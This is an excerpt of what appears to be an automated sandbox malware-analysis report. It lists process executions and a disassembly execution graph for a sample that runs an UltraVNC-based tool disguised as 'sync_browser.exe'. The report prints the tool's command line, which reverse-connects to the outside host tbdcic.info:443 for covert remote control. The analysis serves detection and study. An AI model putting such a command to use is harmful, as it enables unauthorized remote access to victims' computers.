                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:10
                                                                  Start time:07:29:09
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:07:29:10
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /f /im sync_browser.exe
                                                                  Imagebase:0xca0000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:07:29:10
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:07:29:10
                                                                  Start date:23/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                  Imagebase:0x7ff6413e0000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:15
                                                                  Start time:07:29:11
                                                                  Start date:23/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                  Imagebase:0x7ff6413e0000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:16
                                                                  Start time:07:29:12
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:07:29:13
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:07:29:16
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Tasks\sync_browser.exe
                                                                  Imagebase:0x7ff6dc0c0000
                                                                  File size:1'945'368 bytes
                                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:19
                                                                  Start time:07:29:16
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 8
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:07:29:24
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
                                                                  Imagebase:0x7ff6dc0c0000
                                                                  File size:1'945'368 bytes
                                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2276683914.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:07:29:24
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:07:29:26
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 4
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:07:29:30
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 42
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:18.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:26.4%
                                                                    Total number of Nodes:1626
                                                                    Total number of Limit Nodes:16
                                                                    execution_graph 11259 404852 11260 404867 11259->11260 11264 404895 11260->11264 11266 40269a ??3@YAXPAX ??3@YAXPAX 11260->11266 11261 40ce0a memmove 11262 4048a3 11261->11262 11264->11261 11265 404886 ??3@YAXPAX 11265->11260 11266->11265 8461 40c460 8462 40c467 8461->8462 8463 40c46f 8461->8463 8465 40c499 8463->8465 8466 40275c 8463->8466 8471 4026cf 8466->8471 8469 40276a 8469->8465 8470 40276b malloc 8472 4026df 8471->8472 8478 4026db 8471->8478 8473 4026ef GlobalMemoryStatusEx 8472->8473 8472->8478 8474 4026fd 8473->8474 8473->8478 8474->8478 8479 402187 8474->8479 8478->8469 8478->8470 8481 40219e 8479->8481 8480 4021cf GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8483 402207 ??2@YAPAXI GetEnvironmentVariableW 8480->8483 8484 40227f SetLastError 8480->8484 8481->8480 8482 4021c5 8481->8482 8499 408d52 8482->8499 8486 402268 ??3@YAXPAX 8483->8486 8487 402236 GetLastError 8483->8487 8484->8482 8485 402296 8484->8485 8489 4022b5 lstrlenA ??2@YAPAXI 8485->8489 8508 402131 8485->8508 8491 40226b 8486->8491 8487->8486 8490 40223c 8487->8490 8493 402320 MultiByteToWideChar 8489->8493 8494 4022e6 GetLocaleInfoW 8489->8494 8490->8491 8495 402246 lstrcmpiW 8490->8495 8491->8484 8493->8482 8494->8493 8497 40230d _wtol 8494->8497 8495->8486 8498 402255 ??3@YAXPAX 8495->8498 8496 4022ab 8496->8489 8497->8493 8498->8491 8515 407c87 8499->8515 8502 408d89 8520 407ce8 8502->8520 8503 408d77 IsBadReadPtr 8503->8502 8507 408dba 8507->8478 8509 40213b GetUserDefaultUILanguage 8508->8509 8510 40217f 8508->8510 8511 402158 8509->8511 8512 40215c GetSystemDefaultUILanguage 8509->8512 8510->8496 8511->8496 8512->8510 8513 402168 GetSystemDefaultLCID 8512->8513 8513->8510 8514 402178 8513->8514 8514->8510 8533 401458 8515->8533 8518 407ce4 IsWindow 8518->8502 8518->8503 8519 407cc0 GetSystemMetrics GetSystemMetrics 8519->8518 8521 407cf7 8520->8521 8522 407d5b 8520->8522 8521->8522 8541 402771 8521->8541 8532 407a5b ??3@YAXPAX 8522->8532 8524 407d08 8525 402771 2 API calls 8524->8525 8526 407d13 8525->8526 8545 4041f8 8526->8545 8529 4041f8 20 API calls 8530 407d25 ??3@YAXPAX ??3@YAXPAX 8529->8530 8530->8522 8532->8507 8536 401172 8533->8536 8537 401180 ??2@YAPAXI 8536->8537 8538 4011be 8536->8538 8537->8538 8539 4011a1 ??3@YAXPAX 8537->8539 8538->8518 8538->8519 8539->8538 8542 402788 8541->8542 8543 401172 2 API calls 8542->8543 8544 402793 8543->8544 8544->8524 8552 402b71 8545->8552 8549 404210 8588 4041c4 8549->8588 8553 401458 2 API calls 8552->8553 8554 402b7f 8553->8554 8555 402b8f ExpandEnvironmentStringsW 8554->8555 8556 401172 2 API calls 8554->8556 8557 402bb3 8555->8557 8558 402ba8 ??3@YAXPAX 8555->8558 8556->8555 8599 4027aa 8557->8599 8559 402bea 8558->8559 8565 403ebc 8559->8565 8562 402bce 8603 4013a9 8562->8603 8564 402be2 ??3@YAXPAX 8564->8559 8566 401458 2 API calls 8565->8566 8567 403eca 8566->8567 8568 4013a9 2 API calls 8567->8568 8569 403ed5 8568->8569 8607 4027c2 8569->8607 8571 403ee2 8572 402771 2 API calls 8571->8572 8573 403eef 8572->8573 8611 403e41 8573->8611 8576 4013a9 2 API calls 8577 403f13 8576->8577 8578 4027c2 2 API calls 8577->8578 8579 403f20 8578->8579 8580 402771 2 API calls 8579->8580 8581 403f2d 8580->8581 8582 403e41 3 API calls 8581->8582 8583 403f3d ??3@YAXPAX 8582->8583 8584 402771 2 API calls 8583->8584 8585 403f54 8584->8585 8586 403e41 3 API calls 8585->8586 8587 403f63 ??3@YAXPAX ??3@YAXPAX 8586->8587 8587->8549 8589 402b71 6 API calls 8588->8589 8590 4041cf 8589->8590 8636 403f77 8590->8636 8592 4041dc 8659 404032 8592->8659 8594 4041e7 8682 4040ed 8594->8682 8596 4041ed 8597 402b71 6 API calls 8596->8597 8598 4041f3 8597->8598 8598->8529 8600 4027b6 8599->8600 8601 4027bc ExpandEnvironmentStringsW 8599->8601 8602 401172 2 API calls 8600->8602 8601->8562 8602->8601 8604 4013b5 8603->8604 8606 4013c7 8603->8606 8605 401172 2 API calls 8604->8605 8605->8606 8606->8564 8608 4027cf 8607->8608 8616 4013df 8608->8616 8610 4027da 8610->8571 8612 403e53 ??3@YAXPAX 8611->8612 8615 403e57 8611->8615 8612->8576 8615->8612 8620 4029d8 8615->8620 8624 403303 8615->8624 8617 401423 8616->8617 8618 4013f3 8616->8618 8617->8610 8619 401172 2 API calls 8618->8619 8619->8617 8621 4029ee 8620->8621 8623 402a02 8621->8623 8628 4025a5 memmove 8621->8628 8623->8615 8625 403312 8624->8625 8627 40332b 8625->8627 8629 402a90 8625->8629 8627->8615 8628->8623 8630 402aa0 8629->8630 8631 4013df 2 API calls 8630->8631 8632 402aac 8631->8632 8635 4025a5 memmove 8632->8635 8634 402ab9 8634->8627 8635->8634 8637 401458 2 API calls 8636->8637 8638 403f85 8637->8638 8639 4013a9 2 API calls 8638->8639 8640 403f90 8639->8640 8641 4027c2 2 API calls 8640->8641 8642 403f9d 8641->8642 8643 402771 2 API calls 8642->8643 8644 403faa 8643->8644 8645 403e41 3 API calls 8644->8645 8646 403fba ??3@YAXPAX 8645->8646 8647 4013a9 2 API calls 8646->8647 8648 403fce 8647->8648 8649 4027c2 2 API calls 8648->8649 8650 403fdb 8649->8650 8651 402771 2 API calls 8650->8651 8652 403fe8 8651->8652 8653 403e41 3 API calls 8652->8653 8654 403ff8 ??3@YAXPAX 8653->8654 8655 402771 2 API calls 8654->8655 8656 40400f 8655->8656 8657 403e41 3 API calls 8656->8657 8658 40401e ??3@YAXPAX ??3@YAXPAX 8657->8658 8658->8592 8660 401458 2 API calls 8659->8660 8661 404040 8660->8661 8662 4013a9 2 API calls 8661->8662 8663 40404b 8662->8663 8664 4027c2 2 API calls 8663->8664 8665 404058 8664->8665 8666 402771 2 API calls 8665->8666 8667 404065 8666->8667 8668 403e41 3 API calls 8667->8668 8669 404075 ??3@YAXPAX 8668->8669 8670 4013a9 2 API calls 8669->8670 8671 404089 8670->8671 8672 4027c2 2 API calls 8671->8672 8673 404096 8672->8673 8674 402771 2 API calls 8673->8674 8675 4040a3 8674->8675 8676 403e41 3 API calls 8675->8676 8677 4040b3 ??3@YAXPAX 8676->8677 8678 402771 2 API calls 8677->8678 8679 4040ca 8678->8679 8680 403e41 3 API calls 8679->8680 8681 4040d9 ??3@YAXPAX ??3@YAXPAX 8680->8681 8681->8594 8683 402771 2 API calls 8682->8683 8684 404100 8683->8684 8685 403e41 3 API calls 8684->8685 8686 404111 ??3@YAXPAX 8685->8686 8686->8596 8701 409f00 8702 40275c 48 API calls 8701->8702 8703 409f0a 8702->8703 8687 40ba20 8689 40ba3d 8687->8689 8688 40ba4c 8689->8688 8692 409f60 8689->8692 8693 409f6a 8692->8693 8697 409f8a 8693->8697 8698 401d13 8693->8698 8696 40275c 48 API calls 8696->8697 8699 401d20 8698->8699 8700 401d1a free 8698->8700 8699->8696 8700->8699 8705 40f227 _EH_prolog 8713 40f25a 8705->8713 8706 40f27c 8707 40f387 8740 4011d1 8707->8740 8709 40f3b1 8714 40f3be ??2@YAPAXI 8709->8714 8710 40f39c 8793 40ef85 8710->8793 8711 40f040 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8711->8713 8713->8706 8713->8707 8713->8711 8715 40f1fd 8 API calls 8713->8715 8717 40ce5c VirtualFree free ??3@YAXPAX ??3@YAXPAX ctype 8713->8717 8786 40f117 8713->8786 8790 40ef63 8713->8790 8733 40f3d8 8714->8733 8715->8713 8717->8713 8719 40f422 8796 40f090 8719->8796 8720 40f485 ??2@YAPAXI 8720->8733 8722 40f090 3 API calls 8722->8733 8726 40ef85 ctype 3 API calls 8726->8733 8728 40f502 8729 40f090 3 API calls 8728->8729 8730 40f527 8729->8730 8731 40ef85 ctype 3 API calls 8730->8731 8731->8706 8733->8706 8733->8719 8733->8720 8733->8722 8733->8726 8733->8728 8734 40f5c5 8733->8734 8750 40faff 8733->8750 8754 40e9ef 8733->8754 8799 40f776 ??2@YAPAXI 8733->8799 8801 40faac 8733->8801 8736 40f090 3 API calls 8734->8736 8737 40f5e4 8736->8737 8738 40ef85 ctype 3 API calls 8737->8738 8738->8706 8741 401235 SendMessageW 8740->8741 8742 4011df GetDiskFreeSpaceExW 8740->8742 8748 40121d 8741->8748 8742->8741 8743 4011f7 8742->8743 8743->8741 8744 402187 19 API calls 8743->8744 8745 401210 8744->8745 8746 408d52 27 API calls 8745->8746 8747 401216 8746->8747 8747->8748 8749 40122e 8747->8749 8748->8709 8748->8710 8749->8741 8751 40fb28 8750->8751 8805 40f962 8751->8805 9082 410a40 8754->9082 8757 40ea0c 8757->8733 8759 40eb20 9100 40e6d7 8759->9100 8760 40ea58 ??2@YAPAXI 8769 40ea40 8760->8769 8762 40ea7c ??2@YAPAXI 8762->8769 8769->8759 8769->8760 8769->8762 9155 40e45f ??2@YAPAXI 8769->9155 8787 40f126 8786->8787 8789 40f12c 8786->8789 8787->8713 8788 40f142 _CxxThrowException 8788->8787 8789->8787 8789->8788 8791 40cde2 4 API calls 8790->8791 8792 40ef6b 8791->8792 8792->8713 8794 40cdda ctype 3 API calls 8793->8794 8795 40ef93 8794->8795 8797 40e4dd ctype 3 API calls 8796->8797 8798 40f09b 8797->8798 8800 40f7a8 8799->8800 8800->8733 8803 40fab1 8801->8803 8802 40fad8 8802->8733 8803->8802 8804 40f841 112 API calls 8803->8804 8804->8803 8806 40f967 8805->8806 8807 40f99d 8806->8807 8809 40f841 8806->8809 8807->8733 8810 40f85b 8809->8810 8814 401815 8810->8814 8877 40ca28 8810->8877 8811 40f88f 8811->8806 8815 401831 8814->8815 8821 401827 8814->8821 8880 41017a _EH_prolog 8815->8880 8817 40185e 8924 40cb68 8817->8924 8818 401458 2 API calls 8819 401877 8818->8819 8822 401b51 ??3@YAXPAX 8819->8822 8823 40188c 8819->8823 8821->8811 8827 40cb68 VariantClear 8822->8827 8906 401370 8823->8906 8826 401897 8910 401551 8826->8910 8827->8821 8830 4013a9 2 API calls 8831 4018b6 ??3@YAXPAX 8830->8831 8836 4018c8 8831->8836 8856 401b17 ??3@YAXPAX 8831->8856 8833 40cb68 VariantClear 8833->8821 8834 4018e9 8835 40cb68 VariantClear 8834->8835 8837 4018f1 ??3@YAXPAX 8835->8837 8836->8834 8838 401953 8836->8838 8839 401914 8836->8839 8837->8817 8841 401991 8838->8841 8842 401978 8838->8842 8840 40cb68 VariantClear 8839->8840 8843 401926 ??3@YAXPAX 8840->8843 8845 4019b3 GetLocalTime SystemTimeToFileTime 8841->8845 8846 401999 8841->8846 8844 40cb68 VariantClear 8842->8844 8843->8817 8847 401980 ??3@YAXPAX 8844->8847 8845->8846 8846->8839 8848 4019d0 8846->8848 8849 4019e7 8846->8849 8847->8817 8928 4036f1 lstrlenW 8848->8928 8915 403387 GetFileAttributesW 8849->8915 8853 401b23 GetLastError 8853->8856 8854 401a07 ??2@YAPAXI 8857 401a13 8854->8857 8855 401b19 8855->8853 8856->8833 8952 40ca5c 8857->8952 8860 401afe 8863 40cb68 VariantClear 8860->8863 8861 401a4e GetLastError 8955 40133e 8861->8955 8863->8856 8864 401a60 8865 4036f1 88 API calls 8864->8865 8869 401a6e ??3@YAXPAX 8864->8869 8867 401abb 8865->8867 8867->8869 8870 40ca5c 2 API calls 8867->8870 8868 401a8b 8871 40cb68 VariantClear 8868->8871 8869->8868 8872 401ae0 8870->8872 8873 401a99 ??3@YAXPAX 8871->8873 8874 401ae4 GetLastError 8872->8874 8875 401af5 ??3@YAXPAX 8872->8875 8873->8817 8874->8869 8875->8860 9074 40c95f 8877->9074 8881 410283 8880->8881 8882 4101b5 8880->8882 8883 4101d2 8881->8883 8884 410288 8881->8884 8882->8883 8885 4101c4 8882->8885 8886 41024f 8882->8886 8893 4101f8 8883->8893 8984 40fefb 8883->8984 8889 410292 8884->8889 8892 4101e4 8884->8892 8894 41023d 8884->8894 8887 4101c9 8885->8887 8885->8894 8886->8893 8958 4132af 8886->8958 8898 4101cf 8887->8898 8904 4101fd 8887->8904 8889->8894 8889->8904 8892->8893 8972 40cc18 8892->8972 8967 40cb6d 8893->8967 8980 40cbf3 8894->8980 8897 410265 8961 40cbac 8897->8961 8898->8883 8898->8892 8899 40cb68 VariantClear 8903 40185a 8899->8903 8903->8817 8903->8818 8904->8893 8976 40cc38 8904->8976 8907 401387 8906->8907 8908 401172 2 API calls 8907->8908 8909 401392 8908->8909 8909->8826 8911 40133e 2 API calls 8910->8911 8912 40155f 8911->8912 8999 401429 8912->8999 8914 40156a 8914->8830 8916 4033a4 8915->8916 8920 4019f3 8915->8920 8917 4033a8 SetLastError 8916->8917 8918 4033b5 8916->8918 8917->8920 8919 4033be 8918->8919 8918->8920 8921 4033cc FindFirstFileW 8918->8921 9002 40335a 8919->9002 8920->8853 8920->8854 8920->8855 8921->8919 8923 4033df FindClose CompareFileTime 8921->8923 8923->8919 8923->8920 8927 40cb24 8924->8927 8925 40cb45 VariantClear 8925->8821 8926 40cb5c 8926->8821 8927->8925 8927->8926 8929 402771 2 API calls 8928->8929 8930 403712 8929->8930 8931 401172 2 API calls 8930->8931 8932 403722 8930->8932 8931->8932 8934 403770 GetSystemTimeAsFileTime GetFileAttributesW 8932->8934 8937 403814 8932->8937 9043 401b75 CreateDirectoryW 8932->9043 8935 403785 8934->8935 8936 40378f 8934->8936 8938 403387 22 API calls 8935->8938 8939 401b75 4 API calls 8936->8939 8942 403795 ??3@YAXPAX 8936->8942 8940 403844 8937->8940 8937->8942 8938->8936 8950 4037a2 8939->8950 8941 408dbf 57 API calls 8940->8941 8947 40384e ??3@YAXPAX 8941->8947 8949 403859 8942->8949 8943 4037a7 9049 408dbf 8943->9049 8945 403808 ??3@YAXPAX 8945->8949 8946 4037ba memcpy 8946->8950 8947->8949 8949->8839 8950->8943 8950->8945 8950->8946 8951 401b75 4 API calls 8950->8951 8951->8950 9071 40ca45 8952->9071 8956 401172 2 API calls 8955->8956 8957 401358 8956->8957 8957->8864 8959 40133e 2 API calls 8958->8959 8960 4132bc 8959->8960 8960->8897 8988 40cb96 8961->8988 8964 40cbd1 8965 40cbec ??3@YAXPAX 8964->8965 8966 40cbd6 _CxxThrowException 8964->8966 8965->8893 8966->8965 8968 40cb24 VariantClear 8967->8968 8969 40cb79 8968->8969 8970 40cb92 8969->8970 8971 40cb7d memcpy 8969->8971 8970->8899 8971->8970 8973 40cc21 8972->8973 8974 40cc26 8972->8974 8975 40cb96 VariantClear 8973->8975 8974->8893 8975->8974 8977 40cc41 8976->8977 8978 40cc46 8976->8978 8979 40cb96 VariantClear 8977->8979 8978->8893 8979->8978 8981 40cc01 8980->8981 8982 40cbfc 8980->8982 8981->8893 8983 40cb96 VariantClear 8982->8983 8983->8981 8985 40ff0d 8984->8985 8986 40ff29 8985->8986 8995 40cc5f 8985->8995 8986->8893 8991 40cb24 8988->8991 8990 40cb9e SysAllocString 8990->8964 8990->8965 8994 40cb2c 8991->8994 8992 40cb45 VariantClear 8992->8990 8993 40cb5c 8993->8990 8994->8992 8994->8993 8996 40cc68 8995->8996 8998 40cc6d 8995->8998 8997 40cb96 VariantClear 8996->8997 8997->8998 8998->8986 9000 4013df 2 API calls 8999->9000 9001 401439 9000->9001 9001->8914 9008 402ff3 9002->9008 9004 403363 9005 403384 9004->9005 9006 403368 GetLastError 9004->9006 9005->8920 9007 403373 9006->9007 9007->8920 9009 403000 GetFileAttributesW 9008->9009 9010 402ffc 9008->9010 9011 403011 9009->9011 9012 403016 9009->9012 9010->9004 9011->9004 9013 403034 9012->9013 9014 40301a SetFileAttributesW 9012->9014 9019 402ee6 9013->9019 9015 403030 9014->9015 9016 403027 DeleteFileW 9014->9016 9015->9004 9016->9004 9020 402771 2 API calls 9019->9020 9021 402efd 9020->9021 9022 4027c2 2 API calls 9021->9022 9023 402f0a FindFirstFileW 9022->9023 9024 402fc2 SetFileAttributesW 9023->9024 9038 402f2c 9023->9038 9026 402fe5 ??3@YAXPAX 9024->9026 9027 402fcd RemoveDirectoryW 9024->9027 9025 401370 2 API calls 9025->9038 9029 402fed 9026->9029 9027->9026 9028 402fda ??3@YAXPAX 9027->9028 9028->9029 9029->9004 9031 4027c2 2 API calls 9031->9038 9032 402f91 SetFileAttributesW 9032->9026 9036 402f9a DeleteFileW 9032->9036 9033 402f5c lstrcmpW 9034 402f72 lstrcmpW 9033->9034 9035 402fa5 FindNextFileW 9033->9035 9034->9035 9034->9038 9037 402fbb FindClose 9035->9037 9035->9038 9036->9038 9037->9024 9038->9025 9038->9026 9038->9031 9038->9032 9038->9033 9038->9035 9039 402ee6 2 API calls 9038->9039 9040 401526 9038->9040 9039->9038 9041 4013df 2 API calls 9040->9041 9042 401530 9041->9042 9042->9038 9044 401bb6 9043->9044 9045 401b86 GetLastError 9043->9045 9044->8932 9046 401ba0 GetFileAttributesW 9045->9046 9048 401b95 9045->9048 9046->9044 9046->9048 9047 401b96 SetLastError 9047->8932 9048->9044 9048->9047 9050 402187 19 API calls 9049->9050 9051 408dd3 wvsprintfW 9050->9051 9052 408ea2 9051->9052 9053 408df4 GetLastError FormatMessageW 9051->9053 9056 408cdb 27 API calls 9052->9056 9054 408e22 FormatMessageW 9053->9054 9055 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9053->9055 9054->9052 9054->9055 9060 408cdb 9055->9060 9058 408eae 9056->9058 9058->8942 9061 408d50 ??3@YAXPAX LocalFree 9060->9061 9062 408cea 9060->9062 9061->9058 9063 407c87 4 API calls 9062->9063 9064 408cf9 IsWindow 9063->9064 9065 408d10 IsBadReadPtr 9064->9065 9068 408d22 9064->9068 9065->9068 9066 407ce8 22 API calls 9067 408d48 9066->9067 9070 407a5b ??3@YAXPAX 9067->9070 9068->9066 9070->9061 9072 40ca28 2 API calls 9071->9072 9073 401a46 9072->9073 9073->8860 9073->8861 9079 40c88e 9074->9079 9077 40c993 9077->8811 9078 40c96e CreateFileW 9078->9077 9080 40c898 CloseHandle 9079->9080 9081 40c8a3 9079->9081 9080->9081 9081->9077 9081->9078 9083 410a59 9082->9083 9098 40ea08 9082->9098 9083->9098 9185 410817 9083->9185 9085 410c33 9086 40ce5c ctype 4 API calls 9085->9086 9086->9098 9088 410817 7 API calls 9089 410af5 9088->9089 9089->9085 9090 410b25 9089->9090 9192 40ce5c 9090->9192 9092 410b2e 9093 410bab 9092->9093 9095 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9092->9095 9093->9093 9094 40ce5c ctype 4 API calls 9093->9094 9096 410be7 9094->9096 9095->9092 9097 40ce5c ctype 4 API calls 9096->9097 9097->9098 9098->8757 9099 406eb0 InitializeCriticalSection 9098->9099 9099->8769 9226 40e214 9100->9226 9156 40e46e 9155->9156 9157 4107a2 4 API calls 9156->9157 9158 40e485 9157->9158 9158->8769 9186 40cdda ctype 3 API calls 9185->9186 9187 410823 9186->9187 9196 40cd11 9187->9196 9189 41082d 9190 41083f 9189->9190 9191 40ef63 4 API calls 9189->9191 9190->9085 9190->9088 9191->9189 9193 40ce3b 9192->9193 9204 40ccfd 9193->9204 9197 40cda5 9196->9197 9199 40cd24 9196->9199 9197->9189 9198 40cd33 _CxxThrowException 9198->9199 9199->9198 9200 40cd63 ??2@YAPAXI 9199->9200 9201 40cd95 ??3@YAXPAX 9199->9201 9200->9199 9202 40cd79 memcpy 9200->9202 9201->9197 9202->9201 9210 409f10 9204->9210 9213 401cfa 9204->9213 9216 40c7e0 